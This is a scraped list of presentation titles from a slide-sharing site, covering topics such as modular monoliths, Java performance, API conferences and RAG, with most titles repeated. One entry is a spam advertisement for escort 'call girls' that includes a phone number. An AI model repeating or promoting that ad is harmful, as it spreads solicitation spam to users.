Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Kürzlich hochgeladen (20)

Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 

Атаки на видеоконвертеры: год спустя